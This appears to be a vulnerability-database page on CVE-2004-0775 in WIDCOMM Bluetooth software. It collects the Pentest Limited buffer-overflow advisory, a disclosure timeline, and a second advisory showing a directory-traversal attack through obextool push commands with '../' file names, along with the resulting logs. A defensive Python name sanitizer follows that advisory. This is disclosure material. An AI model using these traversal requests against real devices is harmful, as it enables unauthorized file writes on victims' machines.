CVE-2004-0775
CVSS 7.5
Published: 2004-10-20 00:00:00
Revised: 2016-10-17 22:48:55

[Original] Buffer overflow in WIDCOMM Bluetooth Connectivity Software, as used in products such as BTStackServer 1.3.2.7 and 1.4.2.10, Windows XP and Windows 98 with MSI Bluetooth Dongles, and HP IPAQ 5450 running WinCE 3.0, allows remote attackers to execute arbitrary code via certain service requests.


[CNNVD] WIDCOMM Bluetooth Connectivity Software Buffer Overflow Vulnerability (CNNVD-200410-070)

        
WIDCOMM products provide Bluetooth connectivity solutions for a range of devices.
WIDCOMM products do not properly handle various malformed service requests received over Bluetooth. A remote attacker can exploit this flaw to trigger a buffer overflow and may be able to execute arbitrary code on the device with the privileges of the affected process.
No further details are currently available.
        

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:widcomm:bluetooth_communication_software:1.4.1.03
cpe:/a:widcomm:btstackserver:1.3.2.7
cpe:/a:widcomm:btstackserver:1.4.2.10

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0775
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0775
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200410-070
(Official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0029.html
(UNKNOWN)  VULNWATCH  20040811 ptl-2004-03: WIDCOMM Bluetooth Connectivity Software Buffer Overflows
http://marc.info/?l=bugtraq&m=109223783402624&w=2
(UNKNOWN)  BUGTRAQ  20040811 ptl-2004-03: WIDCOMM Bluetooth Connectivity Software Buffer Overflows
http://www.internetnews.com/security/article.php/3394181
(UNKNOWN)  MISC  http://www.internetnews.com/security/article.php/3394181
http://www.pentest.co.uk/documents/ptl-2004-03.html
(VENDOR_ADVISORY)  MISC  http://www.pentest.co.uk/documents/ptl-2004-03.html
http://www.securityfocus.com/archive/1/archive/1/418633/100/0/threaded
(UNKNOWN)  BUGTRAQ  20051204 have you ever been BluePIMped?
http://xforce.iss.net/xforce/xfdb/16953
(VENDOR_ADVISORY)  XF  bluetooth-btw-service-bo(16953)

- Vulnerability information

WIDCOMM Bluetooth Connectivity Software Buffer Overflow Vulnerability
High risk  Boundary condition error
2004-10-20 00:00:00 2005-10-20 00:00:00
Remote
        
WIDCOMM products provide Bluetooth connectivity solutions for a range of devices.
WIDCOMM products do not properly handle various malformed service requests received over Bluetooth. A remote attacker can exploit this flaw to trigger a buffer overflow and may be able to execute arbitrary code on the device with the privileges of the affected process.
No further details are currently available.
        

- Advisories and patches

Vendor patches:
WIDCOMM
-------
The vendor has released an upgrade to fix this security issue; download version 3.0 from the vendor's home page:
        
        http://www.widcomm.com

- Vulnerability information (F37213)

DMA_2005-0412a_.txt (PacketStormID:F37213)
2005-04-20 00:00:00
Kevin Finisterre  digitalmunition.com
advisory
CVE-2004-0775

WIDCOMM Bluetooth Connectivity Software is vulnerable to a directory traversal exploit.

DMA[2005-0412a] - 'Widcomm BTW (Microsoft Windows BT stack) Directory Transversal'
Author: Kevin Finisterre
Vendor: http://66.45.42.84/Products, http://www.broadcom.com/press/release.php?id=525262
Product: 'versions older than BTW 3.0.1.905 ?'
References: http://www.digitalmunition.com/DMA[2005-0412a].txt

Description: 
On August 11 2004 in Advisory Reference ptl-2004-03 Pentest Limited released very minimal 
detail on security issues related to 'WIDCOMM Bluetooth Connectivity Software'. CAN-2004-0775
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0775 was created in order to 
provide information surrounding this issue. Unfortunately none of the links provided by the
CVE entry contain any real data on the attacks. In efforts to document and exploit the 
above mentioned issues I stumbled upon yet another problem. 

WIDCOMM Inc. which is short for Wireless Internet and Data/Voice Communications previously designed
products for indoor wireless communications. Founded in June 1998, the company was focused on 
Bluetooth networking. WIDCOMM's goal was to make it secure, easy, and inexpensive for people with 
PCs, cellular phones, PDAs and laptops to wirelessly link their devices and to access the Internet. 

On May 10 2004 Broadcom Corporation, a leading provider of highly integrated semiconductor 
solutions enabling broadband communications, announced that it had completed the acquisition of WIDCOMM.

I happen to own Bluetooth dongles from Belkin, Actiontec, Linksys, Ambicom, D-link and Zoom and only 
one of them came with BlueSoleil instead of Widcomm based software. I would guess that somewhere 
around 90% of the PC Bluetooth hardware on the market currently comes with Widcomm install media. 

The dongle that I used for testing was an Ambicom BT2000C-US on windows XP SP2. The software that 
was bundled with the dongle was a variant of Widcomm's Bluetooth Software version 1.4.2. Several 
other revisions are available however due to problems with licensing you may find it difficult to 
make use of anything that did not specifically come packaged with your device. I even ran into an 
instance in which my purchased dongle did not even work with the software it was bundled with 
(Thanks D-Link!). 

Several sites document the difficulties that the end user is faced with when trying to use the various
versions of the Widcomm software. Short of stating that Widcomm and Broadcomm have really done a huge 
disservice to their end users, I will not go into the fiasco surrounding license.dat issues. Fixing 
and or patching the vulnerabilities I am going to mention may be compounded by the fact that Widcomm
and Broadcomm's customer base is simply unable to upgrade. Widcomm has in essence shot us all in the 
foot.  

After an install of the Widcomm software you are presented with the 'Initial Bluetooth Configuration'
screen. Here you choose the name of your device and select the bluetooth services it will provide. 
By default 'PIM Item Transfer' is set to start automatically with no authentication required. Under
normal circumstances files are dropped into "<My Documents>\Bluetooth Exchange Folder". Any device 
that attempts to transfer files to or from your device should be limited to accessing this folder. 

Unfortunately this is NOT the case: a simple ../ is enough to cause a little trouble. This attack can
have its limitations depending on how the software settings are configured. Using a modified obextool 
binary from ussp-push we can easily demonstrate the problem. 

As stated above, a normal transaction should limit files to the "<My Documents>\Bluetooth Exchange Folder".

animosity:~/ussp-push-0.2# ./obextool push /etc/hosts 00:0C:41:E2:7A:EE testfile 3
Sending object ...

BtserverSpylite output: 
00:32:17.995 OPP:  Settings for saving objects...
00:32:18.015       vCard's: 'Save to PIM'
00:32:18.035       vCal's:  'Do not accept'
00:32:18.055       vMsg's:  'Do not accept'
00:32:18.075       vNote's: 'Do not accept'
00:32:18.095       Other:   'Save to Inbox folder'
00:32:18.115       Folder:  'C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder\'
00:32:18.135 OPP:  File did not contain an object.  Save to Inbox as 'other' type.
00:32:18.155 OPP:  'testfile' saved to PIM Item Transfer Folder '...My Documents\Bluetooth Exchange Folder'


C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder>dir
 Volume in drive C has no label.
 Volume Serial Number is F888-ED9A

 Directory of C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder

07/12/2005  12:32 AM    <DIR>          .
07/12/2005  12:32 AM    <DIR>          ..
07/12/2005  12:32 AM               262 testfile
               1 File(s)            262 bytes
               2 Dir(s)  35,701,919,744 bytes free

We are however able to travel beyond the Bluetooth Exchange Folder by adding "../" to our request. Under the 
default configuration this allows us to write to the root of the My Documents folder. 

animosity:~/ussp-push-0.2# ./obextool push /etc/hosts 00:0C:41:E2:7A:EE ../Im_rick_james 3
Sending object ...

00:35:19.897 OPP:  '../Im_rick_james' saved to PIM Item Transfer Folder '...\My Documents\Bluetooth Exchange Folder'

C:\Documents and Settings\Administrator\My Documents>dir
 Volume in drive C has no label.
 Volume Serial Number is F888-ED9A

 Directory of C:\Documents and Settings\Administrator\My Documents

07/12/2005  12:35 AM    <DIR>          .
07/12/2005  12:35 AM    <DIR>          ..
07/12/2005  12:35 AM               262 Im_rick_james
07/01/2005  08:38 PM    <DIR>          Bluetooth
07/12/2005  12:32 AM    <DIR>          Bluetooth Exchange Folder
07/01/2005  04:38 PM    <DIR>          My Music
06/25/2005  02:55 PM    <DIR>          My Pictures
06/27/2005  12:08 AM    <DIR>          My Virtual Machines
               1 File(s)            262 bytes
               7 Dir(s)  35,701,919,744 bytes free

Due to an unknown reason, when using the default configuration you are only able to go up one 
directory. Because of this you are limited to being able to write to the My Documents folder ONLY. 
This could be an XP SP2 thing. I have NOT tested this on windows 9x based software at all. In other
words your results may vary. 

animosity:~/ussp-push-0.2# ./obextool push /etc/hosts 00:0C:41:E2:7A:EE ../../beiotch 3            
Sending object ...
00:37:25.457 OPP:  Error - Could not rename 'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\../../beiotch' to 
'C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder\../../beiotch'

If you change the default drop directory from "<My Documents>\Bluetooth Exchange Folder" to something
else we are able to traverse a good portion of the file system. In this example we used 
C:\test\test2\test3\test4 as our bluetooth drop folder. 

00:57:38.471 OPP:  Settings for saving objects...
00:57:38.481       vCard's: 'Save to PIM'
00:57:38.501       vCal's:  'Do not accept'
00:57:38.511       vMsg's:  'Do not accept'
00:57:38.532       vNote's: 'Do not accept'
00:57:38.542       Other:   'Save to Inbox folder'
00:57:38.562       Folder:  'C:\test\test2\test3\test4'
00:57:38.582 OPP:  File did not contain an object.  Save to Inbox as 'other' type.
00:57:38.602 OPP:  '../blah' saved to PIM Item Transfer Folder 'C:\test\test2\test3\test4'

00:57:38.672 GKI freeq 0 (2:4) 1 (0:1) 2 (0:0) 3 (1:12) 4 (0:46)
00:57:57.599 OPP:  Settings for saving objects...
00:57:57.609       vCard's: 'Save to PIM'
00:57:57.629       vCal's:  'Do not accept'
00:57:57.649       vMsg's:  'Do not accept'
00:57:57.669       vNote's: 'Do not accept'
00:57:57.679       Other:   'Save to Inbox folder'
00:57:57.699       Folder:  'C:\test\test2\test3\test4'
00:57:57.719 OPP:  File did not contain an object.  Save to Inbox as 'other' type.
00:57:57.739 OPP:  '../../blah' saved to PIM Item Transfer Folder 'C:\test\test2\test3\test4'

00:58:14.243 OPP:  Settings for saving objects...
00:58:14.263       vCard's: 'Save to PIM'
00:58:14.283       vCal's:  'Do not accept'
00:58:14.293       vMsg's:  'Do not accept'
00:58:14.313       vNote's: 'Do not accept'
00:58:14.333       Other:   'Save to Inbox folder'
00:58:14.343       Folder:  'C:\test\test2\test3\test4'
00:58:14.363 OPP:  File did not contain an object.  Save to Inbox as 'other' type.
00:58:14.383 OPP:  '../../../blah' saved to PIM Item Transfer Folder 'C:\test\test2\test3\test4'

Again for some reason we run into a minor limitation on where the files can be dropped. 

00:58:29.735 OPP:  Settings for saving objects...
00:58:29.755       vCard's: 'Save to PIM'
00:58:29.775       vCal's:  'Do not accept'
00:58:29.795       vMsg's:  'Do not accept'
00:58:29.815       vNote's: 'Do not accept'
00:58:29.835       Other:   'Save to Inbox folder'
00:58:29.855       Folder:  'C:\test\test2\test3\test4'
00:58:29.875 OPP:  File did not contain an object.  Save to Inbox as 'other' type.
00:58:29.895 OPP:  Error - Could not rename 'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\../../../../blah' to 
'C:\test\test2\test3\test4\../../../../blah'

As you can see the bluetooth drop directory can easily be ignored by the attacker. 

C:\>dir test\blah test\test2\blah test\test2\test3\blah 

 Volume in drive C has no label.
 Volume Serial Number is F888-ED9A

 Directory of C:\test

07/12/2005  12:58 AM               262 blah
               1 File(s)            262 bytes

 Directory of C:\test\test2

07/12/2005  12:57 AM               262 blah
               1 File(s)            262 bytes

 Directory of C:\test\test2\test3

07/12/2005  12:57 AM               262 blah
               1 File(s)            262 bytes


I have not seen this issue documented anywhere. It was not described in the release by pentest.co.uk, 
nor was it mentioned in any advisory from Widcomm or Broadcomm. I am unable to tell exactly when this 
issue was introduced into the Widcomm codebase and I am equally unable to tell exactly when it was 
fixed. All of the above testing was performed against PC versions of the software, it is currently 
unknown how other Widcomm platforms are affected by this issue. 

I have confirmed that versions 4.0.1.700 and 3.0.1.905 are NOT exploitable (for this condition). In 
these versions the "../" request is replaced with "..x" thus preventing the attack. 

Timeline associated with this bug:
04/12/2005 Public disclosure due to the fact that the bug was silently fixed by the vendor(s) in the past.

Regurgitated Workaround:
'...(we) recommend that end users stop using the vulnerable WIDCOMM Bluetooth software'. Alternately
users can 'set their Bluetooth device configuration to be non-discoverable or hidden.'. Please note 
however 'This will not stop the device from being vulnerable but it may limit the exposure.' 

Due to the fact that this issue was patched silently NO attempt was made to notify Broadcomm or Widcomm 
about this issue. The issue appears to have been patched in version 3.x. Unfortunately due to licensing 
issues users of this software will find it difficult to patch this vulnerability, and I found it difficult
to research which versions were and were not vulnerable. Bug your vendor to get you some updated software 
and ask them to quit playing games over license.dat files! 

Other vendors are affected by similar issues and future advisories will be released. 

All your Bluetooth are belong to greenplaque. 

-KF
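
The advisory reports that the fixed versions neutralise the traversal by rewriting "../" to "..x". The following is an added example (not code from the advisory or from WIDCOMM) of how a receiving side can instead reject any OBEX object name that carries a directory component and independently confirm that the resolved save path stays inside the drop folder; the unchecked `vulnerable_save_path` models the behaviour visible in the logs above, and the folder and file names are taken from those logs. Windows path semantics are emulated with `ntpath`, so the script runs on any OS.

```python
import ntpath

# Constructed default drop folder, as shown in the advisory's BtserverSpylite log.
DEFAULT_DROP_FOLDER = (r"C:\Documents and Settings\Administrator\My Documents"
                       r"\Bluetooth Exchange Folder")


class RejectedObjectName(ValueError):
    """Raised when an OBEX Name header cannot be used as a bare file name."""


def sanitize_object_name(name: str) -> str:
    """Accept only a bare file name; reject anything carrying a directory part.

    A string substitution such as '../' -> '..x' (what the advisory reports the
    fixed versions do) still writes the object; rejecting the name outright is
    easier to reason about.
    """
    if not name or name in (".", ".."):
        raise RejectedObjectName("empty or dot-only name")
    if "\x00" in name:
        raise RejectedObjectName("NUL byte in name")
    # On Windows both separators split paths, and ':' introduces a drive.
    if any(ch in name for ch in "/\\:"):
        raise RejectedObjectName("separator or drive in name: %r" % name)
    # Windows silently strips trailing dots and spaces, which changes the target.
    if name.rstrip(" .") != name:
        raise RejectedObjectName("trailing dot or space in name: %r" % name)
    return name


def resolve_save_path(drop_folder: str, name: str) -> str:
    """Return the path the object may be written to, verified to lie directly
    inside drop_folder (Windows semantics via ntpath, so this runs anywhere)."""
    base = ntpath.normcase(ntpath.normpath(drop_folder))
    target = ntpath.normpath(ntpath.join(drop_folder, sanitize_object_name(name)))
    # Second, independent check: the parent of the resolved path must be the base.
    if ntpath.normcase(ntpath.dirname(target)) != base:
        raise RejectedObjectName("resolved outside drop folder: %r" % target)
    return target


def vulnerable_save_path(drop_folder: str, name: str) -> str:
    """Constructed model of the unchecked behaviour in the advisory's logs:
    the client-supplied name is simply appended to the folder."""
    return ntpath.normpath(ntpath.join(drop_folder, name))


def check_names(drop_folder: str, names):
    """Classify each name as ('saved', path) or ('rejected', reason)."""
    results = {}
    for n in names:
        try:
            results[n] = ("saved", resolve_save_path(drop_folder, n))
        except RejectedObjectName as exc:
            results[n] = ("rejected", str(exc))
    return results


if __name__ == "__main__":
    # Object names taken from the advisory's own test runs, plus two variants.
    names = ["testfile", "../Im_rick_james", "../../blah", "..\\blah", "blah."]
    for n in names:
        print("%-18s unchecked -> %s" % (n, vulnerable_save_path(DEFAULT_DROP_FOLDER, n)))
    for n, (verdict, detail) in check_names(DEFAULT_DROP_FOLDER, names).items():
        print("%-18s %-8s %s" % (n, verdict, detail))
```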


    

- Vulnerability information (F34022)

ptl-2004-03.txt (PacketStormID:F34022)
2004-08-12 00:00:00
Matt Moore,Mark Rowe  pentest.co.uk
advisory,remote,overflow,arbitrary
CVE-2004-0775

An unauthenticated remote attacker can submit various malformed service requests via Bluetooth, triggering a buffer overflow and executing arbitrary code on vulnerable devices using WIDCOMM Bluetooth Connectivity Software. All releases prior to 3.0 are affected.

Pentest Limited Security Advisory

WIDCOMM Bluetooth Connectivity Software Buffer Overflows

Advisory Details
----------------
Title: WIDCOMM Bluetooth Connectivity Software Buffer Overflows
Announcement date: 11 August 2004
Advisory Reference: ptl-2004-03
CVE Name: CAN-2004-0775
Products: WIDCOMM Bluetooth Connectivity Software
Vulnerability Type : Buffer Overflow
Vendor-URL: http://www.widcomm.com
Vendor-Status: Fixed in release 3.0
Remotely Exploitable: Yes
Locally Exploitable: N/A
Advisory URL: http://www.pentest.co.uk/documents/ptl-2004-03.html

Vulnerability Description
--------------------------
WIDCOMM's products provide a full range of Bluetooth connectivity
solutions for PCs, PDAs, mobile phones, headsets, digital cameras,
access points, and various output devices.

An unauthenticated remote attacker can submit various malformed service
requests via Bluetooth, triggering a buffer overflow and executing
arbitrary code on the vulnerable device.

On Windows platforms this allows arbitrary code execution under the
context of the currently logged on user account.


Vulnerable Versions
--------------------

WIDCOMM supply their Bluetooth Communications software to other
companies to allow them to integrate Bluetooth technology into their
devices. They also supply Bluetooth SDKs to enable developers to create
applications that use Bluetooth. Therefore it may not be immediately
apparent that you are using the WIDCOMM Bluetooth software, and version
numbers may vary.

WIDCOMM's website (http://www.widcomm.com/Partners/index.asp) reports
the following companies as customers or partners with WIDCOMM:

Logitech
Samsung Electro-Mechanics
Sony
Texas Instruments
Compaq Computer Corporation
Dell
National Semiconductor
Matsushita Electric Industrial Co., Ltd.
Wistron NeWeb Corporation
TDK Systems Europe
Zeevo
Cambridge Silicon Radio
Billionton
Broadcom Corporation
LG Innotek
MSI
Fujitsu Siemens Computers
Philips
Silicon Wave
Seiko Instruments Inc.
TECOM
Plantronics
Mobilian
Fujitsu Media Devices Limited
OKI Electric Industry Co. Ltd.
FIC
Costar
Brother
Alcatel
Atmel
Conexant Systems, Inc.
Microtune
OSK


Pentest Limited have tested for the reported vulnerabilities against
BTStackServer version 1.3.2.7 and 1.4.2.10 on both Windows XP and
Windows 98 which ships with MSI Bluetooth Dongles. We have also tested
this against an HP IPAQ 5450 running WinCE 3.0 with Bluetooth software
version 1.4.1.03.

Pentest Limited have also written a proof of concept exploit for Windows
XP.

Whilst the above platforms are the only platforms tested and confirmed
to be exploitable by Pentest Limited, discussions with the vendor lead
us to believe that all versions prior to version BTW & BT-CE/PPC 3.0
are affected by this vulnerability.

WIDCOMM has not confirmed whether BT-PPC/Phone Edition, BT-Smartphone,
BTE-Mobile or BTE are vulnerable.


Vendor Status
--------------
WIDCOMM:
14-11-2003 - Initial Pentest Limited Notification
14-11-2003 - Notification acknowledged by WIDCOMM, request more detail
20-11-2003 - Pentest notify WIDCOMM of another vulnerability
06-01-2004 - Pentest send chase up Email without reply
13-01-2004 - Another email
13-01-2004 - WIDCOMM reply saying they are still working on it
21-01-2004 - Pentest email WIDCOMM that they have written a POC exploit
23-01-2004 - WIDCOMM reply saying they have resolved issue and fix
	     will be available in next release.
10-02-2004 - Pentest ask for an update on expected release date
11-02-2004 - WIDCOMM plan February/early March release date
29-03-2004 - Pentest ask for update
12-05-2004 - Pentest ask for update
12-07-2004 - Pentest send chase up Email without reply
26-07-2004 - Pentest ask whether patches will be released for older
versions
03-08-2004 - WIDCOMM respond. No date set for new release and no patch
	     will be made available for older versions.


Fix
---

Until version 3 of the WIDCOMM software becomes available from WIDCOMM
or their customers/partners Pentest Limited recommend that end users
stop using the vulnerable WIDCOMM Bluetooth software or set their
Bluetooth device configuration to be non-discoverable or hidden. This
will not stop the device from being vulnerable but it may limit the
exposure.


Credit
------

These vulnerabilities were discovered by Mark Rowe and Matt Moore from
Pentest Limited.
    

- Vulnerability information

8603
WIDCOMM Bluetooth Malformed Service Request Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- Vulnerability description

A remote overflow exists in WIDCOMM Bluetooth Connectivity Software. The WIDCOMM Bluetooth Connectivity Software fails to properly sanitize service requests resulting in a buffer overflow. With a specially crafted service request, an attacker can cause arbitrary commands to be executed resulting in a loss of integrity.

- Timeline

2004-08-11 2003-11-14
Unknown Unknown

- Solution

Upgrade to version 3.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

- Vulnerability information

WIDCOMM Bluetooth Communication Software Multiple Unspecified Buffer Overflow Vulnerabilities
Boundary Condition Error 10914
Yes No
2004-08-11 12:00:00 2009-07-12 06:16:00
Discovery is credited to Mark Rowe and Matt Moore of Pentest Limited.

- Affected program versions

WIDCOMM BTStackServer 1.4.2.10
WIDCOMM BTStackServer 1.3.2.7
WIDCOMM Bluetooth Communication Software 1.4.1.03
+ HP IPAQ 2215
+ HP IPAQ 5450
WIDCOMM BTW
WIDCOMM BT-CE/PPC 3.0

- Unaffected program versions

WIDCOMM BTW
WIDCOMM BT-CE/PPC 3.0

- Vulnerability discussion

WIDCOMM Bluetooth Communication Software is susceptible to multiple unspecified remote buffer overflow vulnerabilities. These vulnerabilities exist due to insufficient boundary checks performed by the application.

An unauthenticated remote attacker can trigger the overflow conditions by supplying malformed service requests.

Various devices from multiple vendors are thought to be affected by these issues, as they are implemented with WIDCOMM software. These issues have been verified by the researchers in BTStackServer version 1.3.2.7 and 1.4.2.10 running on Microsoft Windows XP and Windows 98. The HP IPAQ 5450 running WinCE 3.0 with Bluetooth software version 1.4.1.03 is reported to be prone as well.

WIDCOMM Bluetooth Communication Software BTW & BT-CE/PPC 3.0 do not appear to be affected by these issues.

- Exploit

The researchers responsible for discovering these issues have developed a proof of concept to trigger the vulnerabilities. This proof of concept is not available to the public at the moment.

KF <kf_lists@digitalmunition.com> has created an exploit for one of these issues. A patch to alter ussp-push-0.4 is provided in the referenced email from KF, "have you ever been BluePIMped?".

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- References

 

 
